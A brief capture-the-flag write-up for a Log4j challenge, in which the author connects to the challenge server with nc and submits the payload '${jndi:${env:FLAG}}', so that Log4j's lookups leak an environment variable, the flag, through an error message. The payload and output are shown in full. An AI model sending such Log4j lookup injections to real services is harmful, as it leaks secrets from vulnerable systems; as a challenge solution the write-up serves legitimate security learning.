Tags: misc log4j
Rating: 3.5
TL;DR
It's relevant to Log4j – Log4j 2 Lookups.
JNDI can reach outer service. If the server is unreachable, it'll raise an error.
We can use simply Environment Lookup to get the flag XD
$ nc 65.108.176.77 1337
What is your favourite CTF?
${jndi:${env:FLAG}}
:(
2021-12-20 03:18:44,730 main WARN Error looking up JNDI resource [hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.NoInitialContextException: Need to specify class name in environment or system property, or in an application resource file: java.naming.factory.initial
